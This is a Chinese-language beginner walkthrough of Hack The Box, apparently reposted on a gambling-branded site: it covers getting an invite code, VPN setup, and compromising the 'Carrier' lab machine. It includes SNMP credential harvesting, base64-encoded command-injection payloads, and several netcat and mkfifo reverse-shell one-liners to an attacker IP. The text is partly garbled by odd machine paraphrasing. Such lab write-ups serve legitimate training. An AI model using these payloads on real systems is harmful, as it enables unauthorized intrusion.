欢迎访问Sunbet官网(www.sunbet.us),Allbet欧博官网(www.ALLbetgame.us)!

首页Sunbet_行业观察正文

hackthebox 初学者教程

b9e08c31ae1faa592019-01-11898

注册账号

Hack The Box是一个在线平台,许可您测试您的渗入测试妙技,并与其他相似兴致的成员交换设法主意和要领。它包罗一些不断更新的应战。个中一些模仿实在场景,个中一些更倾向于CTF作风的应战。
注册账号须要一个约请码
hackthebox 初学者教程  第1张
1、接见join hib,翻开下面链接
https://www.hackthebox.eu/invite
2、看到一个须要验证码的页面,我们F12检察一下代码
inviteapi.min.js发明一个注册的JS剧本
翻开进去看一下,发明一个makeInviteCode
hackthebox 初学者教程  第2张
在控制台实行一下这个函数,发明回显了一个base64的字符串
SW4gb3JkZXIgdG8gZ2VuZXJhdGUgdGhlIGludml0ZSBjb2RlLCBtYWtlIGEgUE9TVCByZXF1ZXN0IHRvIC9hcGkvaW52aXRlL2dlbmVyYXRl
解密后:
In order to generate the invite code,
make a POST request to /api/invite/generate
hackthebox 初学者教程  第3张
运用curl post要求约请码
curl https://www.hackthebox.eu/api/invite/generate -X POST
返回:
{"success":1,"data":{"code":"QUhMT1UtR1VJU0wtR1RMWEotSkdOSUUtSEROT04=","format":"encoded"},"0":200}
code内容base64解密:
AHLOU-GUISL-GTLXJ-JGNIE-HDNON

openvpn设置装备摆设

在kali下装置这几个源
apt-get install network-manager-openvpn
apt-get install network-manager-openvpn-gnome
apt-get install network-manager-pptp
apt-get install network-manager-pptp-gnome
apt-get install network-manager-strongswan
apt-get install network-manager-vpnc
apt-get install network-manager-vpnc-gnome

在access页面点击here下载openvpn设置装备摆设文件
https://www.hackthebox.eu/home/htb/access/ovpnfile
运用敕令:xxxx.ovpn是下载好的设置装备摆设文件,这里要用root权限运转。
sudo oepnvpn --config xxxx.ovpn
衔接胜利后会在access页面看到connected打勾:
hackthebox 初学者教程  第4张

上岸今后,点开machines->Active
hackthebox 初学者教程  第5张
能够看到 Carrier的IP是10.10.10.105,我们直接接见举行实战。

Carrier实战

拿到两个flag,一个是user.txt,另有一个root.txt
1、运用nmap扫描
nmap -A -sV 10.10.10.105
hackthebox 初学者教程  第6张
2、翻开一下网站,就一个上岸框,实验了注入不可。
hackthebox 初学者教程  第7张
3、扫描一下目次
dirb http://10.10.10.105/ /usr/share/dirb/wordlists/small.txt
hackthebox 初学者教程  第8张
4、检察了一下提醒,扫描一下udp端口(-p167,67是扫描一遍今后获得的)
sudo nmap -sU -sV -p161,67 10.10.10.105
5、snmp的细致版本信息SNMPv1 server; pysnmp SNMPv3 server (public)
6、检察snmp public
snmpwalk -v 2c -c public 10.10.10.105
hackthebox 初学者教程  第9张
7、获得一串字符串STRING: "SN#NET_45JDX23"
8、实验运用admin/NET_45JDX23上岸胜利
hackthebox 初学者教程  第10张
9、顺手点了几下看了功用
hackthebox 初学者教程  第11张
10、翻开Diagnostics页面点击verify status
返回的数据花样有点相似ps敕令的输出花样:
quagga 15105 0.0 0.0 24500 616 ? Ss 09:00 0:00 /usr/lib/quagga/zebra --daemon -A 127.0.0.1
quagga 15109 0.0 0.1 29452 2764 ? Ss 09:00 0:00 /usr/lib/quagga/bgpd --daemon -A 127.0.0.1
root 15114 0.0 0.0 15432 168 ? Ss 09:00 0:00 /usr/lib/quagga/watchquagga --daemon zebra bgpd
抓包检察一下,发明参数check=cXVhZ2dh
base64解密cXVhZ2dh ,末了获得quagga
组织一个root,base64加密后:cm9vdAo=
hackthebox 初学者教程  第12张

11、
我们检察一下敕令的权限,实行| whoami
check=fCB3aG9hbWk=
看到返回的是root

-------------------------------------

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

-------------------------------------

检察文件列表| ls
check=fCBscyA=
test_intercept.pcap
user.txt

实行| cat user.txt
check=fCBjYXQgdXNlci50eHQ=
拿到第一个flag
5649c41df59fd6efdc4a78d79a07f2be

12、实验反弹shell
检察一下是不是有nc。 | which nc
/bin/nc

在kali监听nc -nlvp 4444
在靶机上实行nc -e /bin/sh 10.10.15.7 4444
发明并没有接收到SHELL,那很有多是靶机的NC不支持-e操纵

实行:| ls -al /bin/nc
返回:lrwxrwxrwx 1 root root 20 Jun 22 2018 /bin/nc -> /etc/alternatives/nc
实行:| ls -al /etc/alternatives/nc
返回:lrwxrwxrwx 1 root root 15 Jun 22 2018 /etc/alternatives/nc -> /bin/nc.openbsd
google了一下nc -e不克不及运用的情况下弹shell要领,也能够搜刮openbsd
1、失利
| mkfifo pipe && nc 10.10.15.7 4444 <pipe | / bin / bash&> pipe
fCBta2ZpZm8gcGlwZSAmJiBuYyAxMC4xMC4xNS43IDQ0NDQgPHBpcGUgfCAvIGJpbiAvIGJhc2gGPiBwaXBlCg==
2、胜利
| mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 10.10.15.7 4444 1>/tmp/backpipe
3、胜利
| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.7 4444 >/tmp/f
hackthebox 初学者教程  第13张

这里彷佛并没有root.txt的信息。
只好去论坛找些hint了https://forum.hackthebox.eu/discussion/1115/carrier/p4
在ticket这个处所找到一个hint,上面有几个IP段,个中10.120.15.0/24在链接FTP的时刻出了点题目。
hackthebox 初学者教程  第14张
背面实验运用NC 扫描了ftp的端口在 10.10.120.15 21是翻开的。然则实验匿名接见并没有甚么结果。
hackthebox 初学者教程  第15张
提交flag点开Carrier(靶机称号),在Own User、Own root提交
hackthebox 初学者教程  第16张

网友评论